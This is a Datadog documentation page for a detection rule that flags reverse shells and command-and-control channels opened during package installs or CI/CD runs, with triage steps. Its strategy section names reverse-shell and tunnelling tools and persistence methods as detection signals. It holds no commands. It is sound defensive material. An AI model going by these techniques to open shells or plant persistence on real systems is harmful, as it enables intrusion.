---
title: Supply chain reverse shell
description: Datadog, the leading service for cloud-scale monitoring.
breadcrumbs: Docs > Datadog Security > OOTB Rules > Supply chain reverse shell
---

# Supply chain reverse shell
Classification:attackTactic:[TA0011-command-and-control](https://attack.mitre.org/tactics/TA0011)Technique:[T1195-supply-chain-compromise](https://attack.mitre.org/techniques/T1195) 
## What happened{% #what-happened %}

A reverse shell or command-and-control (C2) channel was established during a supply chain operation, such as package installation or CI/CD pipeline execution, on host `{{host}}`. A process running in the supply chain execution context spawned a shell or established a network tunnel to an attacker-controlled endpoint.

## Goal{% #goal %}

Detect when a malicious package or compromised CI/CD pipeline step establishes remote access through reverse shells, network tunnels, or C2 channels. This pattern is used by attackers to gain interactive access for lateral movement, privilege escalation, and data exfiltration.

## Strategy{% #strategy %}

This rule correlates three signal categories within `package_install_*` or `cicd_runner_*` execution contexts:

- **Reverse shell**: Execution of netcat, socat, openssl, Python, or Perl-based reverse shell techniques during package installation or CI/CD execution
- **Network C2**: Use of tunneling or lateral movement tools (chisel, ngrok, ligolo-ng), suspicious shell network connections, or IRC connections
- **Persistence**: Installation of cron jobs, systemd services, SSH authorized keys, kernel modules, or linker modifications

Persistence is used as a severity amplifier. A reverse shell combined with persistence indicates the attacker is establishing a durable foothold, not just a one-off connection.

## Triage and response{% #triage-and-response %}

1. Identify the package or CI/CD step that triggered the shell or network activity by examining the correlation key and process tree.
1. Capture the destination IP/hostname of the reverse shell or C2 connection for IOC tracking.
1. Terminate the malicious process and kill the reverse shell connection immediately.
1. Check if persistence mechanisms were installed (cron jobs, systemd units, SSH keys) and remove them.
1. Investigate whether the attacker performed any lateral movement or accessed additional systems.
1. Remove the malicious package and audit all systems that installed it.
1. Block the C2 IP/domain at the network perimeter.
1. Follow your organization's incident response process for active intrusions.